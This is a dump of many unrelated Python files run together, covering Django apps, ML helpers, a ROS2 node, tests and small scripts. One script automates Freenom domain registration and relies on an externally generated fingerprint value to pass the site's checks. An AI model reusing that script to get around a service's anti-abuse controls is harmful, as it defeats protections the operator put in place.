'https://my.freenom.com/cart.php?a=confdomains'}) soup = BeautifulSoup(r.text,"lxml") form = soup.find("form", {"id":"mainfrm"}).findAll("input") skipValues = ["accepttos", "fpbb"] # generate fpbb value with https://repl.it/repls/FamousVoluminousDesigners fpbb = " payload = { "accepttos": "on", "token": token, "country": "US", "fpbb": fpbb, } for value in form: if value.get("name") in skipValues or value.get("name") == None: continue payload[value.get("name")] = value.get("value") r = self.session.post("https://my.freenom.com/cart.php?a=checkout", payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/cart.php?a=checkout'}) if "Your Order Number is:" not in r.text: raise FreenomError("Registering the domain was unsuccessful. You may of been banned.") if __name__ == '__main__': if len(sys.argv) != 4: print("usage: freenom EMAIL PASSWORD DOMAIN") exit() freenom = Freenom() freenom.login(sys.argv[1], sys.argv[2]) freenom.register_domain(sys.argv[3]) josueischiu12/parqueopython from django.db import models from phonenumber_field.modelfields import PhoneNumberField class Cliente(models.Model): """Informacion del cliente.""" nombre = models.CharField(max_length=60) apellido = models.CharField(max_length=60) tax_id = models.TextField(blank=True, default="C/F") direccion = models.TextField(blank=True, default="Ciudad") telefono = PhoneNumberField(blank=True) email = models.EmailField(blank=True) def __str__(self): return self.nombre + " " + self.apellido import tensorflow as tf def partitionfunc(n, partition_length, unit_of_num_in_partition=1, min_num_in_partition=None): ''' got idea from https://stackoverflow.com/a/18503391 n is the integer to partition, k is the length of partitions, l is the min partition element size ''' min_length = 1 assert n % unit_of_num_in_partition == 0 if min_num_in_partition is None: min_num_in_partition = unit_of_num_in_partition assert min_num_in_partition % unit_of_num_in_partition == 0 if partition_length < min_length: raise StopIteration if partition_length == min_length: if n >= min_num_in_partition: yield (n,) raise StopIteration # i means minimum number of a specific result partition. for i in range(min_num_in_partition, n + 1, unit_of_num_in_partition): for result in partitionfunc(n - i, partition_length - 1, unit_of_num_in_partition, min_num_in_partition=i): yield (i,) + result def _round_to_multiple_of(val, divisor, round_up_bias=0.9): """ round function which have same behavior in python2 and python3. from https://github.com/pytorch/vision/blob/78ed10cc51067f1a6bac9352831ef37a3f842784/torchvision/models/mnasnet.py#L68 """ assert 0.0 <= round_up_bias < 1.0 new_val = max(divisor, int(val + divisor / 2.0) // divisor * divisor) return new_val if new_val >= round_up_bias * val else new_val + divisor def round_to_multiple_of(val, divisor=1): return _round_to_multiple_of(val, divisor, round_up_bias=0.0) def argmax(l): # from https://towardsdatascience.com/there-is-no-argmax-function-for-python-list-cd0659b05e49 f = lambda i: l[i] return max(range(len(l)), key=f) def ceil_div(num, divisor): return (num + divisor - 1) // divisor def linear(x, start_x, start_y, end_x, end_y): x = tf.cast(x, tf.float32) return ((x - start_x) / (end_x - start_x)) * (end_y - start_y) + start_y def smooth_square(x, start_x, start_y, end_x, end_y): x = tf.cast(x, tf.float32) x_normalized = (x - start_x) / (end_x - start_x) left_square = 2 * x_normalized ** 2 right_square = 1 - 2 * (1 - x_normalized) ** 2 square = tf.cond(x_normalized <= 0.5, lambda: left_square, lambda: right_square) return square * (end_y - start_y) + start_y#!/usr/bin/env python3 # Copyright (c) 2020 The Plankton Authors. # All rights reserved. # # This source code is derived from UUV Simulator # (https://github.com/uuvsimulator/uuv_simulator) # Copyright (c) 2016-2019 The UUV Simulator Authors # licensed under the Apache license, Version 2.0 # cf. 3rd-party-licenses.txt file in the root directory of this source tree. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import traceback import threading import rclpy import sys from numpy import pi from uuv_world_ros_plugins_msgs.srv import * from plankton_utils.time import time_in_float_sec from plankton_utils.time import is_sim_time def main(): rclpy.init() sim_time_param = is_sim_time() node = rclpy.create_node( 'set_timed_current_perturbation', allow_undeclared_parameters=True, automatically_declare_parameters_from_overrides=True, parameter_overrides=[sim_time_param]) node.get_logger().info('Starting current perturbation node') node.get_logger().info('Programming the generation of a current perturbation') starting_time = 0.0 if node.has_parameter('starting_time'): starting_time = node.get_parameter('starting_time').value if starting_time < 0.0: node.get_logger().warn('Negative starting time, setting it to 0.0') starting_time = 0.0 node.get_logger().info('Starting time={} s'.format(starting_time)) end_time = -1 if node.has_parameter('end_time'): end_time = node.get_parameter('end_time').value if end_time > 0 and end_time <= starting_time: raise RuntimeError('End time is smaller than the starting time') node.get_logger().info('End time=%s' % (end_time if end_time > 0 else 'Inf.')) vel = 0.0 if node.has_parameter('current_velocity'): vel = float(node.get_parameter('current_velocity').value) node.get_logger().info('Current velocity [m/s]={}'.format(vel)) horz_angle = 0.0 if node.has_parameter('horizontal_angle'): horz_angle = float(node.get_parameter('horizontal_angle').value) horz_angle *= pi / 180 node.get_logger().info('Current horizontal angle [deg]={}'.format( horz_angle * 180 / pi)) vert_angle = 0.0 if node.has_parameter('vertical_angle'): vert_angle = float(node.get_parameter('vertical_angle').value) vert_angle *= pi / 180 node.get_logger().info('Current vertical angle [deg]={}'.format(horz_angle * 180 / pi)) # Create client service srv_name = '/hydrodynamics/set_current_velocity' set_current = node.create_client(SetCurrentVelocity, srv_name) if not set_current.wait_for_service(timeout_sec=20): node.get_logger().error('%s service not available! Closing node...' %(srv_name)) sys.exit(-1) # Wait to set the current model FREQ = 100 rate = node.create_rate(FREQ) thread = threading.Thread(target=rclpy.spin, args=(node,), daemon=True) thread.start() # Make sure the clock has been updated when using sim time while node.get_clock().now() == rclpy.time.Time(clock_type=node.get_clock().clock_type): pass while time_in_float_sec(node.get_clock().now()) < starting_time: if 1.0 / FREQ < starting_time: rate.sleep() node.get_logger().info('Applying current model...') req = SetCurrentVelocity.Request() req.velocity = vel req.horizontal_angle = horz_angle req.vertical_angle = vert_angle future = set_current.call_async(req) # NB : spining is done from another thread while not future.done(): pass try: response = future.result() except Exception as e: node.get_logger().error('Service call ' + srv_name + ' failed, error=' + repr(e)) else: if response.success: t = time_in_float_sec(node.get_clock().now()) node.get_logger().info('Current velocity changed successfully at %f s! vel= %f m/s' % (t, vel)) else: node.get_logger().error('Service call ' + srv_name + ' return a "failed" value') # Returning to previous state if end_time > 0: while time_in_float_sec(node.get_clock().now()) < end_time: if 1.0 / FREQ < end_time: rate.sleep() req.velocity = 0.0 req.horizontal_angle = horz_angle req.vertical_angle = vert_angle node.get_logger().info('TIMEOUT, setting current velocity to zero...') future = set_current.call_async(req) # NB : spining is done from another thread while not future.done(): pass try: response = future.result() except Exception as e: node.get_logger().error('Service call ' + srv_name + ' failed, error=' + repr(e)) node.get_logger().info('Leaving node...') node.destroy_node() rclpy.shutdown() thread.join() # ============================================================================= if __name__ == '__main__': try: main() except Exception as e: print('Something went wrong: ' + repr(e)) print(traceback.print_exc()) finally: if rclpy.ok(): rclpy.shutdown() numbers = [int(num) for num in input().split(", ")] boundary = 10 while numbers: current_list = [] index = 0 while index < len(numbers): num = numbers[index] if num <= boundary: current_list.append(num) numbers.remove(numbers[index]) continue index += 1 print(f"Group of {boundary}'s: {current_list}") boundary += 10 def get_all_sentiment_data(doc, lemma_doc): print("") print("========= Sentiment Analysis (Working) ==============") print(f"{doc._.polarity} {lemma_doc._.polarity}") print(f"{doc._.subjectivity} {lemma_doc._.subjectivity}") print(f"{doc._.assessments} {lemma_doc._.assessments}") def get_sentiment(sent): return sent._.polarity, sent._.subjectivity, sent._.assessments #!python # -*- coding: iso-8859-1 -*- import datetime import py from ll.xist import xsc from ll.xist.ns import xml, html, meta codetemplate = """ import os base = %r crontabs = os.listdir(base) channel.send(len(crontabs)) for file in crontabs: channel.send((file, os.popen('crontab -u %%s -l' %% file).read())) """ class Host(object): def __init__(self, name, dir="/var/spool/cron/crontabs", python="python2.4"): self.name = name self.dir = dir self.python = python def getcrontabs(self): code = py.code.Source(codetemplate % self.dir) gateway = py.execnet.SshGateway("root@%s" % self.name, remotepython=self.python) channel = gateway.remote_exec(code) count = channel.receive() for i in xrange(count): yield channel.receive() gateway.exit() hosts = [ Host("host1.example.com"), Host("host2.example.org"), Host("host3.example.net"), ] style = """ body { margin: 0; padding: 0; background-color: #fff; color: #000; } .note { font-size: 13px; } h1, h2, h3 { color: #0063a8; font-family: "Trebuchet MS", sans-serif; font-weight: normal; } h1 { font-size: 30px; color: #fff; background-color: #0063a8; padding: 8px 30px; } h2 { font-size: 20px; margin: 30px 30px -10px 30px; } h3 { font-size: 14px; margin: 20px 30px 2px 30px; } pre { margin: 0px 30px 10px 30px; font-size: 11px; line-height: 18px; border: 1px solid #eee; background-color: #fafafa; padding: 1px 5px 2px 5px; overflow: auto; } """ now = datetime.datetime.now() node = xsc.Frag(html.h1("Cronjobs ", html.span("(generated at %s)" % now.strftime("%d.%m.%Y %H:%M"), class_="note"))) for host in hosts: node.append(html.h2(host.name)) for (user, crontab) in sorted(host.getcrontabs()): node.append(html.h3(user, "@", host.name)) node.append(html.pre(crontab.decode("latin-1").strip())) node = xsc.Frag( xml.XML10(), "\n", html.head( meta.contenttype(), html.title("Cronjobs"), html.style(style, type="text/css"), ), html.body(node) ) print e.asBytes(encoding="iso-8859-1") from importlib import import_module from typing import Any def import_from_string(import_str: Any) -> Any: import_str = str(import_str) module_str, _, attrs_str = import_str.partition(":") assert module_str and attrs_str, f"Import string '{import_str}' must be in format ':'" module = import_module(module_str) instance = module for attr in attrs_str.split("."): instance = getattr(instance, attr) return instance tests/common.py """Common data structures for testing.""" # pylint: disable=missing-docstring,no-self-use from typing import Any GLOBAL_VARIABLE = "global_value" class SomeClass: ATTR = "class_attr" def __init__(self) -> None: self.attr = "instance_attr" def _private(self) -> str: return "private_value" def __very_private(self) -> str: # pylint: disable=unused-private-member return "very_private_value" def instance_method(self) -> str: return self.attr async def async_instance_method(self) -> str: return self.attr def instance_method_with_args(self, arg1: int) -> int: return arg1 async def async_instance_method_with_args(self, arg1: int) -> int: return arg1 @classmethod def class_method(cls) -> str: return cls.ATTR @classmethod def class_method_with_args(cls, arg1: int) -> int: return arg1 @classmethod async def async_class_method(cls) -> str: return cls.ATTR @classmethod async def async_class_method_with_args(cls, arg1: int) -> int: return arg1 @staticmethod def static_method() -> str: return "static_value" @staticmethod def static_method_with_args(arg1: int) -> int: return arg1 @staticmethod async def async_static_method() -> str: return "static_value" @staticmethod async def async_static_method_with_args(arg1: int) -> int: return arg1 @property def some_property(self) -> str: return self.attr class DerivedClass(SomeClass): pass class Proxy: """Proxy to another object. This can be used to test mocking proxied objects. Code from OBJECT PROXYING (PYTHON RECIPE): https://code.activestate.com/recipes/496741-object-proxying/ """ def __init__(self, obj: Any) -> None: object.__setattr__(self, "_obj", obj) def __getattribute__(self, name: str) -> Any: return getattr(object.__getattribute__(self, "_obj"), name) def __delattr__(self, name: str) -> None: delattr(object.__getattribute__(self, "_obj"), name) def __setattr__(self, name: str, value: Any) -> None: setattr(object.__getattribute__(self, "_obj"), name, value) def __nonzero__(self) -> bool: return bool(object.__getattribute__(self, "_obj")) def __str__(self) -> str: return str(object.__getattribute__(self, "_obj")) def __repr__(self) -> str: return repr(object.__getattribute__(self, "_obj")) _special_names = [ "__abs__", "__add__", "__and__", "__call__", "__cmp__", "__coerce__", "__contains__", "__delitem__", "__delslice__", "__div__", "__divmod__", "__eq__", "__float__", "__floordiv__", "__ge__", "__getitem__", "__getslice__", "__gt__", "__hash__", "__hex__", "__iadd__", "__iand__", "__idiv__", "__idivmod__", "__ifloordiv__", "__ilshift__", "__imod__", "__imul__", "__int__", "__invert__", "__ior__", "__ipow__", "__irshift__", "__isub__", "__iter__", "__itruediv__", "__ixor__", "__le__", "__len__", "__long__", "__lshift__", "__lt__", "__mod__", "__mul__", "__ne__", "__neg__", "__oct__", "__or__", "__pos__", "__pow__", "__radd__", "__rand__", "__rdiv__", "__rdivmod__", "__reduce__", "__reduce_ex__", "__repr__", "__reversed__", "__rfloorfiv__", "__rlshift__", "__rmod__", "__rmul__", "__ror__", "__rpow__", "__rrshift__", "__rshift__", "__rsub__", "__rtruediv__", "__rxor__", "__setitem__", "__setslice__", "__sub__", "__truediv__", "__xor__", "next", ] @classmethod def _create_class_proxy(cls, theclass: Any) -> Any: """Creates a proxy for the given class.""" def make_method(name: str) -> Any: def method(self: Any, *args: Any, **kwargs: Any) -> Any: return getattr(object.__getattribute__(self, "_obj"), name)(*args, **kwargs) return method namespace = {} for name in cls._special_names: if hasattr(theclass, name): namespace[name] = make_method(name) return type(f"{cls.__name__}({theclass.__name__})", (cls,), namespace) def __new__(cls, obj: Any, *args: Any, **kwargs: Any) -> Any: """Creates an proxy instance referencing `obj`. (obj, *args, **kwargs) are passed to this class' `__init__`, so deriving classes can define an __init__ method of their own. Note: `_class_proxy_cache` is unique per deriving class (each deriving class must hold its own cache). """ try: cache = cls.__dict__["_class_proxy_cache"] except KeyError: cls._class_proxy_cache = cache = {} try: theclass = cache[obj.__class__] except KeyError: cache[obj.__class__] = theclass = cls._create_class_proxy(obj.__class__) ins = object.__new__(theclass) theclass.__init__(ins, obj, *args, **kwargs) return ins def some_function(arg1: str) -> str: return arg1 async def some_async_function(arg1: str) -> str: return arg1 #!/usr/bin/env python3 import sys from readers.read_ape import ApeReader FILE_PATH = sys.argv[1] ape_reader = ApeReader(FILE_PATH) print('Ocorrencias do erro: {}'.format(len(ape_reader.error_lines))) cores = list() for k in ape_reader.corrections: flat = [sub[1] for sub in k] cores.append(flat) print('Nenhuma sugestao de correcao: {}'.format( len([x for x in cores if len(x) < 2]))) print('Efetivamente avaliadas: {}'.format( len([x for x in cores if 'red' in x or 'green' in x or 'yellow' in x]))) print('Pelo menos uma sugestao correta: {}'.format( len([x for x in cores if 'green' in x]))) print('Pelo menos uma sugestao parcialmente correta: {}'.format( len([x for x in cores if 'yellow' in x]))) print('Pelo menos uma sugestao parcialmente correta e nenhuma correta: {}'.format( len([x for x in cores if 'yellow' in x and 'green' not in x]))) print('Pelo menos uma sugestao errada: {}'.format( len([x for x in cores if 'red' in x]))) print('Todas as sugestoes erradas: {}'.format( len([x for x in cores if 'red' in x and 'green' not in x and 'yellow' not in x]))) from random import getrandbits def getrandom(n): return [int(getrandbits(1)) for _ in range(n)] def matrix_mult(A, b): return [sum([b[i] * k for i, k in enumerate(A[m])]) for m in range(len(A))] def matrix_multiplication(A, B, C, epoch): for i in epoch: random = getrandom(len(A[0])) check = matrix_mult(A, random) result1 = matrix_mult(B, check) result2 = matrix_mult(C, random) if result1 != result2: return False return True # Copyright 2019 The Wallaroo Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. See the License for the specific language governing # permissions and limitations under the License. import os # This first import is required for integration harness and wallaroo lib # imports to work (it does path mungling to ensure they're available) import conformance # Test specific imports from conformance.applications.system_events import (MultiPartitionDetectorPony, MultiPartitionDetectorPython2, MultiPartitionDetectorPython3, Grow, Shrink, Crash, Recover, Rotate, Wait) from integration import clear_current_test # Example manual test: # # def test_grow1_shrink1(): # conf = {} # # ResilienceTestBaseApplications provide their own test runner # # So we only need to give it a config and a sequence of operations # with MultiPartitionDetector(config=conf) as test: # test.run_test_sequence([Wait(3), Grow(1), Wait(1), Shrink(1), Wait(1)]) #################### # Generative Tests # #################### # Test creator import sys THIS = sys.modules[__name__] # Passed to create_test RESILIENCE = os.environ.get("resilience", None) def create_test(name, app, config, ops, require_resilience=False): if require_resilience and RESILIENCE != "on": return else: def f(): with app(config, ops=ops) as test: test.run_test_sequence() f.__name__ = name f = clear_current_test(f) setattr(THIS, name, f) APPS = [MultiPartitionDetectorPony, MultiPartitionDetectorPython2, MultiPartitionDetectorPython3] #################### # Resilience Tests # #################### SOURCE_TYPES = ['alo'] SOURCE_NUMBERS = [1] RESILIENCE_SEQS = [ # wait, grow1, wait, shrink1, wait, crash2, wait, recover [Wait(3), Grow(1), Wait(2), Shrink(1), Wait(2), Crash(2), Wait(3), Recover(2), Wait(5)], # crash1, recover1 [Wait(3), Crash(1), Wait(2), Recover(1), Wait(5)], # crash2, recover2 [Wait(3), Crash(2), Wait(2), Recover(2), Wait(5)], # Log rotate [Wait(3), Rotate(), Wait(2)], # Log rotate and crash [Wait(3), Rotate(), Wait(2), Crash(1), Wait(2), Recover(1), Wait(2)], ] # Test generation - Resilience + Log rotation: for app in APPS: for ops in RESILIENCE_SEQS: for src_type in SOURCE_TYPES: for src_num in SOURCE_NUMBERS: test_name = ( 'test_resilience_{app}_{source_type}_{source_number}_{ops}' .format( app=app.name, source_type=src_type, source_number=src_num, ops='_'.join((o.name().replace(':','') for o in ops)))) create_test( name = test_name, app = app, config = {'command_parameters': {'source': src_type}, 'source_number': src_num}, ops = ops, require_resilience=True) ################# # Autoscale tests ################# OPS = [Grow(1), Grow(4), Shrink(1), Shrink(4)] SOURCE_TYPES = ['tcp', 'alo'] SOURCE_NUMBERS = [1] # Programmatically create the tests, do the name mangling, and place them # in the global scope for pytest to find for app in APPS: for o1 in OPS: for o2 in OPS: if o1 == o2: ops = [o1] else: ops = [o1, Wait(4), o2] for src_type in SOURCE_TYPES: for src_num in SOURCE_NUMBERS: test_name = ( 'test_autoscale_{app}_{source_type}_{source_number}_{ops}' .format( app=app.name, source_type=src_type, source_number=src_num, ops='_'.join((o.name().replace(':','') for o in ops)))) create_test( name = test_name, app = app, config = {'command_parameters': {'source': src_type}, 'source_number': src_num}, ops = ops, require_resilience=False) hfsfolder-python/hfsfolder_python.py #!/usr/bin/python import sys from ProcessFolders import ProcessFolders def main(): processFolders = ProcessFolders() folder = "" tojson = False tofile = False toinsert = False tocvs = False if len(sys.argv[1:]) > 0: for opt in sys.argv[1:]: if not opt.__contains__("--"): folder = opt if opt.__contains__("--version"): print("hfsfolder 1.0") if opt.__contains__("--tojson"): tojson = True if opt.__contains__("--tofile"): tofile = True if opt.__contains__("--toinsert"): toinsert = True if opt.__contains__("--tocvs"): tocvs = True if len(folder) > 0: data = "" outFile = "hfsfolder" if tojson: outFile += ".json" data = processFolders.processFoldersToJson(folder) if toinsert: naba = input("Inform tab number: ") naba = int(naba) outFile += "-insert.sql" data = processFolders.processFoldersToInsert(folder, naba) if tocvs: outFile += ".csv" data = processFolders.processFoldersToCSV(folder) if tofile and len(data) > 0: processFolders.processFoldersToFile(data, outFile) print("Finish process folders!") elif len(data) > 0: print(data) if not tojson and not toinsert and not tocvs and not tofile: print("Inform option!") else: if tojson or toinsert or tocvs or tofile: print("Inform folder!") else: print("HFSFolder \n" \ + "Usage:\n" \ + " python hfsfolder_python.py /folder\n\n" \ + "Options:\n" \ + " --version\n" \ + " --tojson\n" \ + " --toinsert\n" \ + " --tocvs\n" \ + " --tofile\n\n" \ + "Example:\n" \ + " python hfsfolder_python.py /folder --tojson --tofile --version\n") if __name__ == "__main__": main() import traceback from pycompss.api.task import task from pycompss.api.constraint import constraint from pycompss.api.parameter import FILE_IN, FILE_OUT from biobb_common.tools import file_utils as fu from biobb_analysis.gromacs import gmx_image import os import sys @constraint(computingUnits="1") @task(input_traj_path=FILE_IN, input_top_path=FILE_IN, output_traj_path=FILE_OUT, on_failure='IGNORE') def gmx_image_pc(input_traj_path, input_top_path, output_traj_path, properties, **kwargs): try: os.environ.pop('PMI_FD', None) os.environ.pop('PMI_JOBID', None) os.environ.pop('PMI_RANK', None) os.environ.pop('PMI_SIZE', None) gmx_image.GMXImage(input_traj_path=input_traj_path, input_top_path=input_top_path, output_traj_path=output_traj_path, properties=properties, **kwargs).launch() if not os.path.exists(output_traj_path): fu.write_failed_output(output_traj_path) except Exception: traceback.print_exc() fu.write_failed_output(output_traj_path) finally: sys.stdout.flush() sys.stderr.flush()poojavaibhavsahu/Pooja_Python Days = set(["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]) print(Days) print(type(Days)) # print("looping through the set elements ... ") # for i in Days: # print(i) # day=set(["sunday","monday","thuesday","wednesday","thuresday"]) print (type(day)) print(day) for i in day: print(i)"""Example module to test pyRegurgitator""" __version__ = (0, 1, 0) class Foo: def hi(self): print('Hi, this is Foo') @staticmethod def add_4(num): return 4 + num class Bar(Foo): def bar(self): print('foobar') 10-100 import os from flask import current_app def dispatch_rollout_job(rollout_dir, step_count): current_app.job_queue.put({ 'type': 'ROLLOUT', 'data': { 'rollout_dir': rollout_dir, 'rollout_id': os.path.basename(rollout_dir), 'step_count': step_count, } }) #!/usr/bin/env python3 import pexpect class Player(object): """Represents a generic Player program.""" def __init__(self, path): self.path = path self.total_correct = 0 self.total_incorrect = 0 self.total_error = 0 def start_program(self): self.program = pexpect.spawnu(self.path) def get_success_rate(self): if self.total_correct: return 1 - (self.total_incorrect / self.total_correct) else: return 0 from pathlib import Path import argparse parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) optional = parser._action_groups.pop() required = parser.add_argument_group('required arguments') required.add_argument( '-d', '--dataset', choices=['diginetica', 'gowalla', 'lastfm'], required=True, help='the dataset name', ) required.add_argument( '-f', '--filepath', required=True, help='the file for the dataset, i.e., "train-item-views.csv" for diginetica, ' '"loc-gowalla_totalCheckins.txt" for gowalla, ' '"userid-timestamp-artid-artname-traid-traname.tsv" for lastfm', ) optional.add_argument( '-t', '--dataset-dir', default='datasets/{dataset}', help='the folder to save the preprocessed dataset', ) parser._action_groups.append(optional) args = parser.parse_args() dataset_dir = Path(args.dataset_dir.format(dataset=args.dataset)) if args.dataset == 'diginetica': from utils.data.preprocess import preprocess_diginetica preprocess_diginetica(dataset_dir, args.filepath) else: from pandas import Timedelta from utils.data.preprocess import preprocess_gowalla_lastfm csv_file = args.filepath if args.dataset == 'gowalla': usecols = [0, 1, 4] interval = Timedelta(days=1) n = 30000 else: usecols = [0, 1, 2] interval = Timedelta(hours=8) n = 40000 preprocess_gowalla_lastfm(dataset_dir, csv_file, usecols, interval, n)draihal/main-pr import factory import factory.fuzzy from faker import Faker from users.factories import StudentFactory from . import models fake = Faker(locale='ru_RU') # TODO: need to add other locale? class AboutUsPageFactory(factory.DjangoModelFactory): class Meta: model = models.AboutUsPage django_get_or_create = ('title', ) title = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) short_description = factory.lazy_attribute(lambda o: fake.sentence( nb_words=6, variable_nb_words=True, ext_word_list=None)) short_about_us = factory.lazy_attribute(lambda o: fake.sentence( nb_words=10, variable_nb_words=True, ext_word_list=None)) class ContactsPageFactory(factory.DjangoModelFactory): class Meta: model = models.ContactsPage django_get_or_create = ('title', ) title = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) vk = factory.lazy_attribute(lambda o: fake.url()) fb = factory.lazy_attribute(lambda o: fake.url()) ok = factory.lazy_attribute(lambda o: fake.url()) youtube = factory.lazy_attribute(lambda o: fake.url()) telegram = factory.lazy_attribute(lambda o: fake.url()) address = factory.lazy_attribute(lambda o: fake.address()) details = factory.lazy_attribute(lambda o: fake.sentence( nb_words=8, variable_nb_words=True, ext_word_list=None)) phone_number = factory.lazy_attribute(lambda o: fake.phone_number()) class CourseCategoryFactory(factory.DjangoModelFactory): class Meta: model = models.CourseCategory name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) slug = factory.lazy_attribute(lambda o: fake.user_name()) class CourseFactory(factory.DjangoModelFactory): class Meta: model = models.Course name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) slug = factory.lazy_attribute(lambda o: fake.user_name()) category = factory.SubFactory(CourseCategoryFactory) description = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) necessary_knowledge = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) study_process = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) graduation_project = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) after_training = factory.lazy_attribute(lambda o: fake.sentence( nb_words=15, variable_nb_words=True, ext_word_list=None)) class ReviewFactory(factory.DjangoModelFactory): class Meta: model = models.Review student = factory.SubFactory(StudentFactory) course = factory.SubFactory(CourseFactory) text = factory.lazy_attribute(lambda o: fake.sentence( nb_words=12, variable_nb_words=True, ext_word_list=None)) class MassMediaPublicationFactory(factory.DjangoModelFactory): class Meta: model = models.MassMediaPublication name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) slug = factory.lazy_attribute(lambda o: fake.user_name()) publication_url = factory.lazy_attribute(lambda o: fake.url()) mass_media_name = factory.lazy_attribute(lambda o: fake.sentence( nb_words=3, variable_nb_words=True, ext_word_list=None)) date_of_publish = factory.lazy_attribute(lambda o: fake.date()) class SiteConfigurationFactory(factory.DjangoModelFactory): class Meta: model = models.SiteConfiguration django_get_or_create = ('title', ) title = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) short_description = factory.lazy_attribute(lambda o: fake.sentence( nb_words=2, variable_nb_words=True, ext_word_list=None)) 0 from random import randint def roll_int(ctx): """ User input determines the upper bound on the random int. Returns an integer between 1 and rollNum. """ rollNum = ctx.content.split(' ') if len(rollNum) > 1 and rollNum[1].isnumeric() is True: return randint(1, int(rollNum[1])) else: return None 0 """ Test basic command-line handling of the Plugin class. """ import sys from nose import with_setup from NagAconda import Plugin from test import PlugTest from optparse import OptionError class TestOptions(PlugTest): """ Test optparse integration with the Plugin class. Since our class did not actually extend OptionParser or Option, there's a chance something we did damaged the environment. This class ensures basic functionality still exists. """ def test_required(self): """ Test that required options are actually required. """ self.plugin.add_option("t", "test", "Test required parameter", required=True) try: self.plugin.start() except SystemExit as e: print (dir(e)) assert True else: assert False def test_parameter(self): """ Test that a specified parameter actually reaches our option list. """ self.plugin.add_option("t", "test", "Test required parameter", required=True) sys.argv.extend(['-t', 'this.is.a.test']) self.plugin.start() assert self.plugin.options.test == 'this.is.a.test' 1-10 from django.contrib.auth import get_user_model from rest_framework import serializers from django.core import exceptions import django.contrib.auth.password_validation as validators from .models import Dog, Club, User, Show, \ Registration, Ring, Perform, Grade User = get_user_model() class RegistrationSerializer(serializers.ModelSerializer): class Meta: model = User fields = ('username', 'password', 'last_name') extra_kwargs = {'password': {'write_only': True}} def validate_password(self, password): errors = {} try: validators.validate_password(password=password) except exceptions.ValidationError as e: errors['messages'] = list(e.messages) if errors: raise serializers.ValidationError(errors) return password def create(self, validated_data): return User.objects.create_user(**validated_data) class DogListSerializer(serializers.ModelSerializer): class Meta: model = Dog fields = "__all__" class ClubListSerializer(serializers.ModelSerializer): class Meta: model = Club fields = "__all__" class UserListSerializer(serializers.ModelSerializer): class Meta: model = User fields = ("id", "username", "first_name", "last_name", "phone_num", "town") class ShowListSerializer(serializers.ModelSerializer): allowed_dogs = serializers.ListField( child=serializers.IntegerField(), required=False, ) class Meta: model = Show fields = ("id", "show_name", "show_town", "type", "start_date", "end_date", "allowed_dogs") def __init__(self, *args, **kwargs): self._allowed_dogs_by_show = kwargs.pop('allowed_dogs_by_show', None) super(ShowListSerializer, self).__init__(*args, **kwargs) def to_representation(self, instance): ret = super().to_representation(instance) allowed_dogs = self._allowed_dogs_by_show.get(ret['id'], None) if allowed_dogs is not None: ret['allowed_dogs'] = allowed_dogs return ret class RegistrationListSerializer(serializers.ModelSerializer): class Meta: model = Registration fields = "__all__" class RingListSerializer(serializers.ModelSerializer): class Meta: model = Ring fields = "__all__" class PerformListSerializer(serializers.ModelSerializer): class Meta: model = Perform fields = "__all__" class GradeListSerializer(serializers.ModelSerializer): dog = serializers.SerializerMethodField() dog_id = serializers.SerializerMethodField() def get_dog_id(self, obj): return obj.perform.dog.id def get_dog(self, obj): return obj.perform.dog.dog_name class Meta: model = Grade fields = ("expert", "perform", "points1", "points2", "points3", "dog", "dog_id") import aiohttp class Http: def __init__(self,cookies=None,trust_env=False): self.cookies = cookies self.trust_env = trust_env async def __aenter__(self): self._session = aiohttp.ClientSession(cookies=self.cookies,trust_env=self.trust_env) return self async def __aexit__(self, *err): await self._session.close() self._session = None @property def fetch(self): return self._sessionapp/orders/tests/test_order_list.py import uuid from datetime import datetime, timedelta, timezone from django.contrib.auth import get_user_model from django.core.files.uploadedfile import SimpleUploadedFile from django.urls import reverse from rest_framework import status from rest_framework.test import APITestCase from orders.models import Charge, Order from request_shoutout.domain.models import Charge as DomainCharge from shoutouts.models import ShoutoutVideo from talents.models import Talent User = get_user_model() class OrderListByTalentTest(APITestCase): def do_login(self, user, password): data = { 'email': user.email, 'first_name': user.first_name, 'last_name': user.last_name, 'password': password, } response = self.client.post(reverse('accounts:signin'), data, format='json') token = response.data['access'] self.client.credentials(HTTP_AUTHORIZATION=f'Bearer {token}') def setUp(self): self.maxDiff = None password = '' user_1 = User( email='', first_name='Nome', last_name='Sobrenome', ) user_1.set_password(password) user_1.save() self.do_login(user_1, password) self.talent_1 = Talent.objects.create( user=user_1, phone_number=1, area_code=1, main_social_media='', social_media_username='', number_of_followers=1, ) self.one_hour_ago = datetime.now(timezone.utc) - timedelta(hours=1) self.order_data_1 = { 'hash_id': uuid.uuid4(), 'talent_id': self.talent_1.id, 'video_is_for': 'someone_else', 'is_from': 'MJ', 'is_to': 'Peter', 'instruction': "Go Get 'em, Tiger", 'email': '', 'is_public': True, 